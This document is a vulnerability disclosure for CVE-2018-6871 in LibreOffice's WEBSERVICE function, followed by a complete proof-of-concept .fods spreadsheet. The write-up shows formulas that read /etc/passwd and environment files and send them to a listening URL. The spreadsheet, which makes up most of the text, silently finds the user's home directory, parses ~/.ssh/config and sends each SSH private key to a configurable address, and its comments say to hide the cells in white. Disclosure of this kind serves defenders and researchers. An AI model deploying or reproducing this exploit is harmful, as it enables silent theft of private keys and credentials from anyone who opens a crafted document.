# Vulnerability description

[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)

## First part

LibreOffice supports COM.MICROSOFT.WEBSERVICE function:

    https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

The function is required to obtain data by URL, usually used as:

    =FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

In original:

    For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.

## Second part

By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.

# Exploitation

To read file you need just:

    =WEBSERVICE("/etc/passwd")

This function can also be used to send a file:

    =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

For successful operation, you need to send the files of the current user, so you need to retrieve current user home path.

    =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

Also you can parse other files too, like a ~/.ssh/config or something like that.

For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).

# Impact

It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.

# Acknowledgment

Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).

 - - -

# poc.fods

```
<?xml version="1.0" encoding="UTF-8"?>

<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:presentation="urn:oasis:names:tc:opendocument:xmlns:presentation:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.spreadsheet">
 <office:automatic-styles>
  <style:style style:name="co1" style:family="table-column">
   <style:table-column-properties fo:break-before="auto" style:column-width="73.3pt"/>
  </style:style>
  <style:style style:name="co2" style:family="table-column">
   <style:table-column-properties fo:break-before="auto" style:column-width="75.66pt"/>
  </style:style>
  <style:style style:name="co3" style:family="table-column">
   <style:table-column-properties fo:break-before="auto" style:column-width="173.14pt"/>
  </style:style>
  <style:style style:name="co4" style:family="table-column">
   <style:table-column-properties fo:break-before="auto" style:column-width="64.01pt"/>
  </style:style>
  <style:style style:name="co5" style:family="table-column">
   <style:table-column-properties fo:break-before="auto" style:column-width="420.94pt"/>
  </style:style>
  <style:style style:name="co6" style:family="table-column">
   <style:table-column-properties fo:break-before="auto" style:column-width="105.19pt"/>
  </style:style>
  <style:style style:name="ro1" style:family="table-row">
   <style:table-row-properties style:row-height="12.81pt" fo:break-before="auto" style:use-optimal-row-height="true"/>
  </style:style>
  <style:style style:name="ro2" style:family="table-row">
   <style:table-row-properties style:row-height="126.74pt" fo:break-before="auto" style:use-optimal-row-height="false"/>
  </style:style>
  <style:style style:name="ro3" style:family="table-row">
   <style:table-row-properties style:row-height="135.81pt" fo:break-before="auto" style:use-optimal-row-height="true"/>
  </style:style>
  <style:style style:name="ta1" style:family="table" style:master-page-name="Default">
   <style:table-properties table:display="true" style:writing-mode="lr-tb"/>
  </style:style>
  <style:style style:name="ce1" style:family="table-cell" style:parent-style-name="Default" style:data-style-name="N0"/>
  <style:style style:name="ce2" style:family="table-cell" style:parent-style-name="Default">
   <style:text-properties style:use-window-font-color="true"/>
  </style:style>
  <style:style style:name="ce5" style:family="table-cell" style:parent-style-name="Default">
   <style:table-cell-properties fo:background-color="#f3715a"/>
  </style:style>
  <style:page-layout style:name="pm1">
   <style:page-layout-properties style:writing-mode="lr-tb"/>
   <style:header-style>
    <style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-bottom="7.09pt"/>
   </style:header-style>
   <style:footer-style>
    <style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-top="7.09pt"/>
   </style:footer-style>
  </style:page-layout>
  <style:page-layout style:name="pm2">
   <style:page-layout-properties style:writing-mode="lr-tb"/>
   <style:header-style>
    <style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-bottom="7.09pt" fo:border="2.49pt solid #000000" fo:padding="0.51pt" fo:background-color="#c0c0c0">
     <style:background-image/>
    </style:header-footer-properties>
   </style:header-style>
   <style:footer-style>
    <style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-top="7.09pt" fo:border="2.49pt solid #000000" fo:padding="0.51pt" fo:background-color="#c0c0c0">
     <style:background-image/>
    </style:header-footer-properties>
   </style:footer-style>
  </style:page-layout>
 </office:automatic-styles>
 <office:body>
  <office:spreadsheet>
   <table:calculation-settings table:automatic-find-labels="false" table:use-regular-expressions="false" table:use-wildcards="true"/>
   <table:table table:name="Sheet1" table:style-name="ta1">
    <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
    <table:table-column table:style-name="co2" table:default-cell-style-name="Default"/>
    <table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
    <table:table-column table:style-name="co4" table:number-columns-repeated="2" table:default-cell-style-name="Default"/>
    <table:table-column table:style-name="co5" table:default-cell-style-name="Default"/>
    <table:table-column table:style-name="co4" table:number-columns-repeated="2" table:default-cell-style-name="Default"/>
    <table:table-column table:style-name="co6" table:default-cell-style-name="Default"/>
    <table:table-row table:style-name="ro1">
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="8"/>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell table:number-columns-repeated="9"/>
    </table:table-row>
    <table:table-row table:style-name="ro2">
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>Current user:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce1" table:formula="of:="/home/" & MID(COM.MICROSOFT.WEBSERVICE("/proc/self/environ"); FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ")) + LEN("USER="); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE("/proc/self/environ"); FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ")))-FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ"))-LEN("USER=")) & "/"" office:value-type="string" office:string-value="" calcext:value-type="error">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=FIND(":"; [.F3]; [.E3])" office:value-type="float" office:value="689" calcext:value-type="float">
      <text:p>689</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=FIND("/home"; [.F3]; FIND(":x:1000:1000:"; [.F3]))" office:value-type="float" office:value="676" calcext:value-type="float">
      <text:p>676</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=COM.MICROSOFT.WEBSERVICE("/etc/passwd")" office:value-type="string" office:string-value="" calcext:value-type="string">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell/>
     <table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string"><text:p>(change this)</text:p><text:p>Address:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string">
      <text:p>http://localhost:8080</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro3">
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>List of private keys:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce1"/>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & "/.ssh/config"); "~"; [.C3])" office:value-type="string" office:string-value="" calcext:value-type="error">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>Send:</text:p>
     </table:table-cell>
     <table:table-cell/>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>0 (default path)</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.C3] & "/.ssh/id_rsa"" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="5"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C5]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="1" calcext:value-type="float">
      <text:p>1</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F6])" office:value-type="float" office:value="132" calcext:value-type="float">
      <text:p>132</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F6]+LEN("IdentityFile ")" office:value-type="float" office:value="109" calcext:value-type="float">
      <text:p>109</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.F4])" office:value-type="float" office:value="96" calcext:value-type="float">
      <text:p>96</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C6]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="2" calcext:value-type="float">
      <text:p>2</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F7])" office:value-type="float" office:value="297" calcext:value-type="float">
      <text:p>297</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F7]+LEN("IdentityFile ")" office:value-type="float" office:value="259" calcext:value-type="float">
      <text:p>259</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F6];1))" office:value-type="float" office:value="246" calcext:value-type="float">
      <text:p>246</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C7]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="3" calcext:value-type="float">
      <text:p>3</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F8])" office:value-type="float" office:value="436" calcext:value-type="float">
      <text:p>436</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F8]+LEN("IdentityFile ")" office:value-type="float" office:value="409" calcext:value-type="float">
      <text:p>409</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F7];1))" office:value-type="float" office:value="396" calcext:value-type="float">
      <text:p>396</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C8]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="4" calcext:value-type="float">
      <text:p>4</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F9])" office:value-type="float" office:value="586" calcext:value-type="float">
      <text:p>586</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F9]+LEN("IdentityFile ")" office:value-type="float" office:value="563" calcext:value-type="float">
      <text:p>563</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F8];1))" office:value-type="float" office:value="550" calcext:value-type="float">
      <text:p>550</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C9]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="5" calcext:value-type="float">
      <text:p>5</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F10])" office:value-type="float" office:value="718" calcext:value-type="float">
      <text:p>718</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F10]+LEN("IdentityFile ")" office:value-type="float" office:value="695" calcext:value-type="float">
      <text:p>695</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F9];1))" office:value-type="float" office:value="682" calcext:value-type="float">
      <text:p>682</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C10]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="6" calcext:value-type="float">
      <text:p>6</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F11])" office:value-type="float" office:value="882" calcext:value-type="float">
      <text:p>882</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F11]+LEN("IdentityFile ")" office:value-type="float" office:value="860" calcext:value-type="float">
      <text:p>860</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F10];1))" office:value-type="float" office:value="847" calcext:value-type="float">
      <text:p>847</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C11]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="7" calcext:value-type="float">
      <text:p>7</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F12])" office:value-type="float" office:value="1267" calcext:value-type="float">
      <text:p>1267</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F12]+LEN("IdentityFile ")" office:value-type="float" office:value="1240" calcext:value-type="float">
      <text:p>1240</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F11];1))" office:value-type="float" office:value="1227" calcext:value-type="float">
      <text:p>1227</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C12]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="8" calcext:value-type="float">
      <text:p>8</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F13])" office:value-type="float" office:value="1408" calcext:value-type="float">
      <text:p>1408</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F13]+LEN("IdentityFile ")" office:value-type="float" office:value="1383" calcext:value-type="float">
      <text:p>1383</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F12];1))" office:value-type="float" office:value="1370" calcext:value-type="float">
      <text:p>1370</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C13]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro1">
     <table:table-cell/>
     <table:table-cell office:value-type="float" office:value="9" calcext:value-type="float">
      <text:p>9</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])" office:value-type="string" office:string-value="" calcext:value-type="string">
      <text:p></text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F14])" office:value-type="float" office:value="0" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=[.F14]+LEN("IdentityFile ")" office:value-type="float" office:value="0" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F13];1))" office:value-type="float" office:value="0" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C14]))" office:value-type="string" office:string-value="" calcext:value-type="error">
      <text:p>#VALUE!</text:p>
     </table:table-cell>
    </table:table-row>
   </table:table>
   <table:named-expressions/>
  </office:spreadsheet>
 </office:body>
</office:document>
```